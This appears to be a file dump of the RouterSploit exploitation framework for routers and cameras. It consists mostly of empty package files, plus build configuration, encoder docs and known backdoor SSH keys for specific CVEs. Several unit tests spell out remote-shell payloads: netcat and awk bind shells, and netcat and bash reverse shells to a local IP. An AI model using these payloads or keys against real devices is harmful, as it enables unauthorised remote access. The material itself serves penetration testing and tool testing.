/tests/creds/routers/thomson/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/routers/ubiquiti/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/exploits/cameras/avigilon/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/exploits/cameras/brickcom/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/exploits/cameras/cisco/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/exploits/cameras/dlink/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/exploits/cameras/jovision/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/exploits/cameras/multi/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/exploits/cameras/mvpower/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/exploits/cameras/siemens/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/exploits/cameras/xiongmai/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/exploits/misc/wepresent/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/exploits/routers/2wire/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/exploits/routers/3com/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/exploits/routers/asmax/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/exploits/routers/asus/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/exploits/routers/belkin/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/exploits/routers/billion/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/exploits/routers/cisco/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/exploits/routers/comtrend/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/exploits/routers/dlink/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/exploits/routers/huawei/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/exploits/routers/ipfire/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/exploits/routers/linksys/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/exploits/routers/mikrotik/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/exploits/routers/movistar/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/exploits/routers/multi/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/exploits/routers/netcore/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/exploits/routers/netgear/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/exploits/routers/netsys/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/exploits/routers/shuttle/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/exploits/routers/thomson/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/exploits/routers/tplink/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/exploits/routers/zyxel/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/cameras/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/generic/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/printers/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/routers/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/encoders/php/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/encoders/python/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/misc/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/generic/upnp/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/payloads/armle/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/payloads/cmd/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/payloads/mipsbe/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/payloads/mipsle/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/payloads/perl/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/payloads/php/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/payloads/python/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/payloads/x64/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/payloads/x86/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/scanners/misc/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/exploits/cameras/honeywell/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/exploits/routers/technicolor/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/cameras/acti/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/cameras/avtech/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/cameras/axis/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/cameras/basler/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/cameras/canon/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/cameras/cisco/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/cameras/dlink/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/cameras/jvc/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/cameras/speco/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/cameras/vacron/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/routers/2wire/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/routers/3com/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/routers/asmax/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/routers/asus/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/routers/belkin/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/routers/bhu/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/routers/cisco/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/routers/dlink/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/routers/huawei/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/routers/ipfire/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/routers/netsys/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/routers/tplink/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/routers/zte/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/routers/zyxel/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/cameras/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/generic/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/misc/asus/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/misc/miele/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/routers/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/routers/bhu/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/routers/zte/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/generic/bluetooth/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/scanners/cameras/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/scanners/routers/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/cameras/american_dynamics/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/cameras/arecont/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/cameras/avigilon/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/cameras/brickcom/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/cameras/geovision/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/cameras/grandstream/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/cameras/hikvision/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/cameras/honeywell/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/cameras/iqinvision/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/cameras/mobotix/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/cameras/samsung/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/cameras/sentry360/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/cameras/siemens/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/cameras/stardot/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/cameras/videoiq/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/routers/billion/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/routers/comtrend/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/routers/fortinet/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/routers/juniper/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/routers/linksys/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/routers/mikrotik/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/routers/movistar/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/routers/netcore/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/routers/netgear/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/routers/pfsense/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/routers/technicolor/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/routers/thomson/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/routers/ubiquiti/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/cameras/avigilon/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/cameras/brickcom/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/cameras/cisco/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/cameras/dlink/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/cameras/jovision/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/cameras/multi/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/cameras/mvpower/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/cameras/siemens/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/cameras/xiongmai/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/misc/wepresent/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/routers/2wire/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/routers/3com/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/routers/asmax/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/routers/asus/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/routers/belkin/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/routers/billion/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/routers/cisco/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/routers/comtrend/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/routers/dlink/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/routers/fortinet/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/routers/huawei/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/routers/ipfire/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/routers/linksys/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/routers/mikrotik/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/routers/movistar/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/routers/multi/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/routers/netcore/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/routers/netgear/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/routers/netsys/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/routers/shuttle/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/routers/thomson/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/routers/tplink/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/routers/ubiquiti/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/routers/zyxel/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/__init__.py: -------------------------------------------------------------------------------- 1 | __author__ = 'fwkz' 2 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/cameras/grandstream/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/cameras/honeywell/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/routers/technicolor/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/creds/cameras/american_dynamics/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | future 2 | requests==2.21.0 3 | paramiko 4 | pysnmp==4.4.6 5 | pycryptodome 6 | -------------------------------------------------------------------------------- /.dockerignore: -------------------------------------------------------------------------------- 1 | .idea/ 2 | .travis/ 3 | 4 | README.md 5 | LICENSE 6 | .travis.yml 7 | *.pyc 8 | *.log -------------------------------------------------------------------------------- /MANIFEST.in: -------------------------------------------------------------------------------- 1 | recursive-include routersploit/resources/ssh_keys *.json *.key 2 | recursive-include routersploit/resources/vendors *.dat 3 | recursive-include routersploit/resources/wordlists *.txt 4 | -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.6 2 | 3 | COPY requirements.txt /tmp/requirements.txt 4 | RUN python -m pip install -r /tmp/requirements.txt 5 | 6 | WORKDIR /routersploit 7 | COPY . . 8 | 9 | CMD ["python", "rsf.py"] 10 | -------------------------------------------------------------------------------- /requirements-dev.txt: -------------------------------------------------------------------------------- 1 | future 2 | requests==2.21.0 3 | paramiko 4 | pysnmp==4.4.6 5 | pycryptodome 6 | pytest==4.4.0 7 | pytest-forked 8 | pytest-xdist 9 | flake8 10 | git+git://github.com/threat9/threat9-test-bed 11 | -------------------------------------------------------------------------------- /routersploit/core/bluetooth/btle/__init__.py: -------------------------------------------------------------------------------- 1 | from .btle_device import ( 2 | Device 3 | ) 4 | from .btle_scanner import ( 5 | BTLEScanner, 6 | ScanDelegate 7 | ) 8 | 9 | 10 | __all__ = [ 11 | "Device", 12 | "BTLEScanner", 13 | "ScanDelegate", 14 | ] 15 | -------------------------------------------------------------------------------- /.travis/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | set -e 4 | set -x 5 | 6 | if [[ "$(uname -s)" == "Darwin" ]]; then 7 | PYENV_ROOT="$HOME/.pyenv" 8 | PATH="$PYENV_ROOT/bin:$PATH" 9 | eval "$(pyenv init -)" 10 | source ~/.venv/bin/activate 11 | fi 12 | 13 | make lint tests 14 | -------------------------------------------------------------------------------- /.travis.yml: -------------------------------------------------------------------------------- 1 | language: python 2 | 3 | matrix: 4 | include: 5 | - os: linux 6 | python: 3.6 7 | 8 | - os: osx 9 | language: generic 10 | env: PYTHON_VERSION=3.6.1 11 | 12 | install: 13 | - "./.travis/install.sh" 14 | 15 | 16 | script: 17 | - "./.travis/run.sh" 18 | -------------------------------------------------------------------------------- /routersploit/resources/ssh_keys/exagrid-cve-2016-1561.json: -------------------------------------------------------------------------------- 1 | { 2 | "username": "root", 3 | "pub_key": "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIBnZQ+6nhlPX/JnX5i5hXpljJ89bSnnrsSs51hSPuoJGmoKowBddISK7s10AIpO0xAWGcr8PUr2FOjEBbDHqlRxoXF0Ocms9xv3ql9EYUQ5+U+M6BymWhNTFPOs6gFHUl8Bw3t6c+SRKBpfRFB0yzBj9d093gSdfTAFoz+yLo4vRw==" 4 | } 5 | -------------------------------------------------------------------------------- /routersploit/resources/ssh_keys/f5-bigip-cve-2012-1493.json: -------------------------------------------------------------------------------- 1 | { 2 | "username": "root", 3 | "pub_key": "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAvIhC5skTzxyHif/7iy3yhxuK6/OB13hjPqrskogkYFrcW8OK4VJ T+5+Fx7wd4sQCnVn8rNqahw/x6sfcOMDI/Xvn4yKU4t8TnYf2MpUVr4ndz39L5Ds1n7Si1m2suUNxWbK v58I8+NMhlt2ITraSuTU0NGymWOc8+LNi+MHXdLk= SCCP Superuser" 4 | } 5 | -------------------------------------------------------------------------------- /routersploit/core/exploit/exceptions.py: -------------------------------------------------------------------------------- 1 | class RoutersploitException(Exception): 2 | def __init__(self, msg: str = ""): 3 | super(RoutersploitException, self).__init__(msg) 4 | 5 | 6 | class OptionValidationError(RoutersploitException): 7 | pass 8 | 9 | 10 | class StopThreadPoolExecutor(RoutersploitException): 11 | pass 12 | -------------------------------------------------------------------------------- /routersploit/resources/ssh_keys/ceragon-fibeair-cve-2015-0936.json: -------------------------------------------------------------------------------- 1 | { 2 | "username": "mateidu", 3 | "pub_key": "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAwRIdDlHaIqZXND/l1vFT7ue3rc/DvXh2yx5EFtuxGQRHVxGMazDhV4vj5ANGXDQwUYI0iZh6aOVrDy8I/y9/y+YDGCvsnqrDbuPDjW26s2bBXWgUPiC93T3TA6L2KOxhVcl7mljEOIYACRHPpJNYVGhinCxDUH9LxMrdNXgP5Ok= mateidu@localhost" 4 | } 5 | -------------------------------------------------------------------------------- /routersploit/resources/wordlists/__init__.py: -------------------------------------------------------------------------------- 1 | import pkg_resources 2 | 3 | 4 | defaults = 'file://' + pkg_resources.resource_filename(__name__, 'defaults.txt') 5 | passwords = 'file://' + pkg_resources.resource_filename(__name__, 'passwords.txt') 6 | usernames = 'file://' + pkg_resources.resource_filename(__name__, 'usernames.txt') 7 | snmp = 'file://' + pkg_resources.resource_filename(__name__, 'snmp.txt') 8 | -------------------------------------------------------------------------------- /tests/payloads/cmd/test_netcat_bind_tcp.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.payloads.cmd.netcat_bind_tcp import Payload 2 | 3 | 4 | # netcat bind tcp payload with rport=4321 5 | bind_tcp = ( 6 | "nc -lvp 4321 -e /bin/sh" 7 | ) 8 | 9 | 10 | def test_payload_generation(): 11 | """ Test scenario - payload generation """ 12 | 13 | payload = Payload() 14 | payload.rport = 4321 15 | 16 | assert payload.run() == bind_tcp 17 | -------------------------------------------------------------------------------- /routersploit/resources/ssh_keys/vagrant.json: -------------------------------------------------------------------------------- 1 | { 2 | "username": "vagrant", 3 | "pub_key": "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA6NF8iallvQVp22WDkTkyrtvp9eWW6A8YVr+kz4TjGYe7gHzIw+niNltGEFHzD8+v1I2YJ6oXevct1YeS0o9HZyN1Q9qgCgzUFtdOKLv6IedplqoPkcmF0aYet2PkEDo3MlTBckFXPITAMzF8dJSIFo9D8HfdOV0IAdx4O7PtixWKn5y2hMNG0zQPyUecp4pzC6kivAIhyfHilFR61RGL+GPXQ2MWZWFYbAGjyiYJnAmCP3NOTd0jMZEnDkbUvxhMmBYSdETk1rRgm+R4LOzFUGaHqHDLKLX+FIPKcF96hrucXzcWyLbIbEgE98OHlnVYCzRdK8jlqm8tehUc9c9WhQ== vagrant insecure public key" 4 | } 5 | -------------------------------------------------------------------------------- /tests/payloads/cmd/test_awk_bind_tcp.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.payloads.cmd.awk_bind_tcp import Payload 2 | 3 | 4 | # awk bind tcp payload with rport=4321 5 | bind_tcp = ( 6 | "awk 'BEGIN{s=\"/inet/tcp/4321/0/0\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'" 7 | ) 8 | 9 | 10 | def test_payload_generation(): 11 | """ Test scenario - payload generation """ 12 | 13 | payload = Payload() 14 | payload.rport = 4321 15 | 16 | assert payload.run() == bind_tcp 17 | -------------------------------------------------------------------------------- /tests/payloads/cmd/test_awk_bind_udp.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.payloads.cmd.awk_bind_udp import Payload 2 | 3 | 4 | # awk bind udp payload with rport=4321 5 | bind_udp = ( 6 | "awk 'BEGIN{s=\"/inet/udp/4321/0/0\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'" 7 | ) 8 | 9 | 10 | def test_payload_generation(): 11 | """ Test scenario - payload generation """ 12 | 13 | payload = Payload() 14 | payload.rport = 4321 15 | 16 | assert payload.run() == bind_udp 17 | -------------------------------------------------------------------------------- /docs/modules/encoders/php/hex.md: -------------------------------------------------------------------------------- 1 | ## Description 2 | 3 | Module encodes PHP payload to Hex format. 4 | 5 | ## Verification Steps 6 | 7 | 1. Start `./rsf.py` 8 | 2. Do: `use encoders/php/hex` 9 | 3. Do: `show info` 10 | 11 | ## Scenarios 12 | 13 | ``` 14 | rsf > use encoders/php/hex 15 | rsf (PHP Hex Encoder) > show info 16 | 17 | Name: 18 | PHP Hex Encoder 19 | 20 | Description: 21 | Module encodes PHP payload to Hex format. 22 | 23 | Authors: 24 | - Marcin Bury 25 | ``` 26 | -------------------------------------------------------------------------------- /tests/creds/routers/mikrotik/test_api_ros_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.mikrotik.api_ros_default_creds import Exploit 2 | 3 | 4 | def test_check_success(tcp_target): 5 | """ Test scenario - testing against mikrotik api ros server """ 6 | 7 | exploit = Exploit() 8 | 9 | exploit.target = tcp_target.host 10 | exploit.port = tcp_target.port 11 | 12 | assert exploit.check() 13 | # assert exploit.check_default() is None 14 | # assert exploit.run() is None 15 | -------------------------------------------------------------------------------- /tests/payloads/cmd/test_netcat_reverse_tcp.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.payloads.cmd.netcat_reverse_tcp import Payload 2 | 3 | 4 | # netcat reverse tcp payload with lhost=192.168.1.4 lport=4321 5 | reverse_tcp = ( 6 | "nc 192.168.1.4 4321 -e /bin/sh" 7 | ) 8 | 9 | 10 | def test_payload_generation(): 11 | """ Test scenario - payload generation """ 12 | 13 | payload = Payload() 14 | payload.lhost = "192.168.1.4" 15 | payload.lport = 4321 16 | 17 | assert payload.run() == reverse_tcp 18 | -------------------------------------------------------------------------------- /docs/modules/encoders/perl/hex.md: -------------------------------------------------------------------------------- 1 | ## Description 2 | 3 | Module encodes Perl payload to hex format. 4 | 5 | ## Verification Steps 6 | 7 | 1. Start `./rsf.py` 8 | 2. Do: `use encoders/perl/hex` 9 | 3. Do: `show info` 10 | 11 | ## Scenarios 12 | 13 | ``` 14 | rsf > use encoders/perl/hex 15 | rsf (Perl Hex Encoder) > show info 16 | 17 | Name: 18 | Perl Hex Encoder 19 | 20 | Description: 21 | Module encodes PERL payload to Hex format. 22 | 23 | Authors: 24 | - Marcin Bury 25 | ``` 26 | -------------------------------------------------------------------------------- /tests/payloads/cmd/test_bash_reverse_tcp.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.payloads.cmd.bash_reverse_tcp import Payload 2 | 3 | 4 | # bash reverse tcp payload with lhost=192.168.1.4 lport=4321 5 | reverse_tcp = ( 6 | "bash -i >& /dev/tcp/192.168.1.4/4321 0>&1" 7 | ) 8 | 9 | 10 | def test_payload_generation(): 11 | """ Test scenario - payload generation """ 12 | 13 | payload = Payload() 14 | payload.lhost = "192.168.1.4" 15 | payload.lport = 4321 16 | 17 | assert payload.run() == reverse_tcp 18 | -------------------------------------------------------------------------------- /docs/modules/encoders/php/base64.md: -------------------------------------------------------------------------------- 1 | ## Description 2 | 3 | Module encodes PHP payload to base64 format. 4 | 5 | ## Verification Steps 6 | 7 | 1. Start `./rsf.py` 8 | 2. Do: `use encoders/php/base64` 9 | 3. Do: `show info` 10 | 11 | ## Scenarios 12 | 13 | ``` 14 | rsf > use encoders/php/base64 15 | rsf (PHP Base64 Encoder) > show info 16 | 17 | Name: 18 | PHP Base64 Encoder 19 | 20 | Description: 21 | Module encodes PHP payload to Base64 format. 22 | 23 | Authors: 24 | - Marcin Bury 25 | ``` 26 | -------------------------------------------------------------------------------- /docs/modules/encoders/python/hex.md: -------------------------------------------------------------------------------- 1 | ## Description 2 | 3 | Module encodes Python payload to hex format. 4 | 5 | ## Verification Steps 6 | 7 | 1. Start `./rsf.py` 8 | 2. Do: `use encoders/python/hex` 9 | 3. Do: `show info` 10 | 11 | ## Scenarios 12 | 13 | ``` 14 | rsf > use encoders/python/hex 15 | rsf (Python Hex Encoder) > show info 16 | 17 | Name: 18 | Python Hex Encoder 19 | 20 | Description: 21 | Module encodes Python payload to Hex format. 22 | 23 | Authors: 24 | - Marcin Bury 25 | 